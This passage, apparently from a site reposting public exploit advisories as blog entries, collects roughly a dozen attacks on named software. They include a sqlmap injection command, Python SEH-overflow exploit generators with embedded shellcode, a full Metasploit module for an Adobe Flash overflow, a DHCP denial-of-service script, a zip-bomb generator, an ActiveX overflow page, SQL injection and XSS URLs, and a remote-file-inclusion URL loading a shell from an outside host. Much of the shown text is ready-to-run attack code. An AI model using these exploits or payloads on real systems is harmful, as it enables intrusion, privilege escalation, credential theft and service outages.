sanitized when creating a directory allowing ../ to create files outside of intended directory: 4 $imagesDirectory = WP_CONTENT_DIR . "/uploads/easy2map/images/map_pins/uploaded/" . $_GET["map_id"] . "/"; . . 11 if (is_uploaded_file($_FILES["pinicon"]['tmp_name'])) { 12 13 if (!file_exists($imagesDirectory)) { 14 mkdir($imagesDirectory); 15 } CVEID: 2015-4614 (SQLi) 2015-4616 (../ bug) OSVDB: Exploit Code: • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3
  12. HireHackking

    Blueberry Express 5.9.0.3678 - Local Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    Document Title: =============== Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1535 Video: http://www.vulnerability-lab.com/get_content.php?id=1537 Release Date: ============= 2015-06-29 Vulnerability Laboratory ID (VL-ID): ==================================== 1535 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn`t miss a thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful editing functions. Do it the easy way with BB FlashBack screen recorder. Its never been easier for everyone to see your movies. BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices.(FlashBack Connect is currently in Beta, and available only to Pro and Standard edition purchasers). (Copy of the Vendor Homepage: http://www.bbsoftware.co.uk/bbflashback.aspx ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a local seh buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software. Vulnerability Disclosure Timeline: ================================== 2015-06-29: Researcher Notification & Coordination (Ateeq Khan) Discovery Status: ================= Published Affected Product(s): ==================== Blueberry Software Product: Blueberry Express - Software 5.9.0.3678 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software. The vulnerability allows local or remote attacker to gain higher system or access privileges by exploitation of a classic seh buffer overflow vulnerability. The local SEH Buffer Overflow affects multiple products including the BBFlashBack Recorder, Batch Export etc. Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with low privilege system user account. The attacker vector of the issue is server-side and the request method to execute the shellcode is local. The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process. Proof of Concept (PoC): ======================= The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. POC Description: For POC, the researcher installed the software with admin privileges on a windows system (allowed to run for all users), while application still running in the background, logged off and logged in with a different (low privileged) user. Exploited the vulnerability successfully hence giving the researcher a system shell with elevated admin privileges. Privilege escalation is possible in this scenario. Malwares wont be able to exploit this vulnerability remotely as this is a Local exploit. Manual steps to reproduce the vulnerability ... 1) Run BB Flashback Express Recorder 2) Goto TOOLS > OPTIONS > MISC 3) Click on "Use custom folder" under the Temp Folder module 4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder 5) Click OK Note: Calculator should popup hence proving the existence of this vulnerability PoC: Exploitcode # Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit # Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/) # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 288 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled print "Creating expoit file" f=open("recorder.txt","w") try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" PoC#2: Exploitcode # Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local) # Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/) print "Creating expoit file" f=open("batch.txt","w") #Create the file # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 6596 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" Reference(s): http://www.bbsoftware.co.uk/ http://www.bbsoftware.co.uk/bbflashback/download.aspx Security Risk: ============== The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
  13. HireHackking

    Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    ----------------- Background ----------------- Orchard is a free, open source, community-focused content management system written in ASP.NET platform using the ASP.NET MVC framework. Its vision is to create shared components for building ASP.NET applications and extensions, and specific applications that leverage these components to meet the needs of end-users, scripters, and developers. ------------------------ Software Version ------------------------ The version of Orchard affected by this issue are 1.7.3, 1.8.2 and 1.9.0. Version below 1.7.3 are not affected --------------- Description --------------- A persistent XSS vulnerability was discovered in the Users module that is distributed with the core distribution of the CMS. The issue potentially allows elevation of privileges by tricking an administrator to execute some custom crafted script on his behalf. The issue affects the Username field, since a user is allowed to register a username containing potentially dangerous characters. More information can be found here http://docs.orchardproject.net/Documentation/Patch-20150630 ---------------------- Proof of Concept ---------------------- 1. Attacker registers a new user account with username e.x <script>alert("XSS")</script> 2. The administrator attempts to delete the account using the Users core module. 3. Once the administrator clicks on the "delete" action, the XSS payload is executed. ------------- Mitigation ------------- See http://docs.orchardproject.net/Documentation/Patch-20150630 ----------- Timeline ----------- 2015-06-10 Vulnerability reported to Orchard CMS development team 2015-06-12 Response and issue verification 2015-06-30 Update and patch release 2015-07-06 Public Disclosure --------- Credits --------- Reported by Paris Zoumpouloglou of Project Zero labs (https://projectzero.gr) -- Paris Zoumpouloglou @pzmini0n https://projectzero.gr
  14. HireHackking

    Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3043'], ['CVE', '2015-3113'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], ['URL', 'http://bobao.360.cn/learning/detail/357.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 23 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @flv = create_flv super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end if request.uri =~ /\.flv$/ print_status('Sending FLV...') send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_flv header = '' header << 'FLV' # signature header << [1].pack('C') # version header << [4].pack('C') # Flags: TypeFlagsAudio header << [9].pack('N') # DataOffset data = '' data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 data << "\xee" * 0x440 # SoundData tag1 = '' tag1 << [8].pack('C') # TagType (audio) tag1 << "\x00\x04\x41" # DataSize tag1 << "\x00\x00\x1a" # TimeStamp tag1 << [0].pack('C') # TimeStampExtended tag1 << "\x00\x00\x00" # StreamID, always 0 tag1 << data body = '' body << [0].pack('N') # PreviousTagSize body << tag1 body << [0xeeeeeeee].pack('N') # PreviousTagSize flv = '' flv << header flv << body flv end end
  15. HireHackking

    ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54665/info ISC DHCP is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition. #!/usr/bin/python ''' SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of service(infinite loop and CPU consumption/chew) via zero'ed client name length http://www.k1p0d.com ''' import socket import getopt from sys import argv def main(): args = argv[1:] try: args, useless = getopt.getopt(args, 'p:h:') args = dict(args) args['-p'] args['-h'] except: usage(argv[0]) exit(-1) dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x22\x5f\xae' '\xa7\xdf\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x63\x82\x53\x63' '\x35\x01\x03\x32\x04\x0a\x00\x00' '\x01\x0c\x00' '\x37\x0d\x01\x1c\x02\x03\x0f' '\x06\x77\x0c\x2c\x2f\x1a\x79\x2a' '\xff\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.connect((args['-h'], int(args['-p']))) sock.sendall(dhcp_req_packet) print 'Packet sent' sock.close() def usage(pyname): print ''' Usage: %s -h <host> -p <port> ''' % pyname if __name__ == "__main__": main()
  16. HireHackking

    Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54677/info Odudeprofile Component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected. http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL)
  17. HireHackking

    phpProfiles - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54660/info phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected. http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS] http://www.example.com/full_release/community.php?comm_id=[SQL] http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?
  18. HireHackking

    tekno.Portal 0.1b - 'anket.php' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54698/info tekno.Portal is prone to an SQL-injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. tekno.Portal 0.1b is vulnerable; other versions may also be affected. http://www.example.com/teknoportal/anket.php?id=[SQLi]
  19. HireHackking

    Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    /* source: https://www.securityfocus.com/bid/54702/info The Linux kernel is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. */ /***************** rds_client.c ********************/ int main(void) { int sock_fd; struct sockaddr_in serverAddr; struct sockaddr_in toAddr; char recvBuffer[128] = "data from client"; struct msghdr msg; struct iovec iov; sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0); if (sock_fd < 0) { perror("create socket error\n"); exit(1); } memset(&serverAddr, 0, sizeof(serverAddr)); serverAddr.sin_family = AF_INET; serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); serverAddr.sin_port = htons(4001); if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) { perror("bind() error\n"); close(sock_fd); exit(1); } memset(&toAddr, 0, sizeof(toAddr)); toAddr.sin_family = AF_INET; toAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); toAddr.sin_port = htons(4000); msg.msg_name = &toAddr; msg.msg_namelen = sizeof(toAddr); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_iov->iov_base = recvBuffer; msg.msg_iov->iov_len = strlen(recvBuffer) + 1; msg.msg_control = 0; msg.msg_controllen = 0; msg.msg_flags = 0; if (sendmsg(sock_fd, &msg, 0) == -1) { perror("sendto() error\n"); close(sock_fd); exit(1); } printf("client send data:%s\n", recvBuffer); memset(recvBuffer, '\0', 128); msg.msg_name = &toAddr; msg.msg_namelen = sizeof(toAddr); msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_iov->iov_base = recvBuffer; msg.msg_iov->iov_len = 128; msg.msg_control = 0; msg.msg_controllen = 0; msg.msg_flags = 0; if (recvmsg(sock_fd, &msg, 0) == -1) { perror("recvmsg() error\n"); close(sock_fd); exit(1); } printf("receive data from server:%s\n", recvBuffer); close(sock_fd); return 0; } /***************** rds_server.c ********************/ int main(void) { struct sockaddr_in fromAddr; int sock_fd; struct sockaddr_in serverAddr; unsigned int addrLen; char recvBuffer[128]; struct msghdr msg; struct iovec iov; sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0); if(sock_fd < 0) { perror("create socket error\n"); exit(0); } memset(&serverAddr, 0, sizeof(serverAddr)); serverAddr.sin_family = AF_INET; serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1"); serverAddr.sin_port = htons(4000); if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) { perror("bind error\n"); close(sock_fd); exit(1); } printf("server is waiting to receive data...\n"); msg.msg_name = &fromAddr; /* * I add 16 to sizeof(fromAddr), ie 32, * and pay attention to the definition of fromAddr, * recvmsg() will overwrite sock_fd, * since kernel will copy 32 bytes to userspace. * * If you just use sizeof(fromAddr), it works fine. * */ msg.msg_namelen = sizeof(fromAddr) + 16; /* msg.msg_namelen = sizeof(fromAddr); */ msg.msg_iov = &iov; msg.msg_iovlen = 1; msg.msg_iov->iov_base = recvBuffer; msg.msg_iov->iov_len = 128; msg.msg_control = 0; msg.msg_controllen = 0; msg.msg_flags = 0; while (1) { printf("old socket fd=%d\n", sock_fd); if (recvmsg(sock_fd, &msg, 0) == -1) { perror("recvmsg() error\n"); close(sock_fd); exit(1); } printf("server received data from client:%s\n", recvBuffer); printf("msg.msg_namelen=%d\n", msg.msg_namelen); printf("new socket fd=%d\n", sock_fd); strcat(recvBuffer, "--data from server"); if (sendmsg(sock_fd, &msg, 0) == -1) { perror("sendmsg()\n"); close(sock_fd); exit(1); } } close(sock_fd); return 0; }
  20. HireHackking

    File Roller v3.4.1 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/perl # # Title: File Roller - DoS PoC # Date: 08/07/2015 # Author: Arsyntex # Homepage: https://wiki.gnome.org/Apps/FileRoller # Version: v3.4.1 # Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux # ------------------------------------------------------------------------- # Create a zip file with a folder inside named: # # # Run: file-roller --extract-here test.zip # # Result: endless call's of lstat64() (50 % CPU usage) (Freeze app) # $zip = "\x50\x4b\x03\x04\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x23\x2f" . "\x50\x4b\x01\x02\x3f\x03\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x10\x80\xfd\x41\x00\x00\x00\x00\x23\x2f" . "\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x30\x00\x00\x00" . "\x20\x00\x00\x00\x00\x00"; open FILE, ">poc.zip" or die("Can't open poc.zip\n") ; binmode(FILE) ; print FILE $zip ; close FILE ;
  21. HireHackking

    ocPortal 7.1.5 - 'redirect' Open Redirection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54715/info ocPortal is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. Versions prior to ocPortal 7.1.6 are vulnerable. http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com
  22. HireHackking

    Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54701/info BarCodeWiz ActiveX control is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input. An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control. Successful exploits will allow attackers to execute arbitrary code within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. BarCodeWiz 4.0.0.0 is vulnerable to this issue; other versions may be affected as well. <html> Exploit <object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc' /></object> <script language='vbscript'> targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX Trial\DLL\BarcodeWiz.dll" prototype = "Property Let Barcode As String" memberName = "Barcode" progid = "BARCODEWIZLib.BarCodeWiz" argCount = 1 arg1=String(14356, "A") poc.Barcode = arg1 </script>
  23. HireHackking

    Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/54725/info Scrutinizer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. #Request 1 GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive #Response 1 <snip> <a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr> <snip> #Request 2 GET /d4d/exporters.php HTTP/1.1 Host: A.B.C.D Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1 Content-Length: 2 #Response 2 <snip> <a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a> <snip>
  24. HireHackking

    Scrutinizer 9.0.1.19899 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
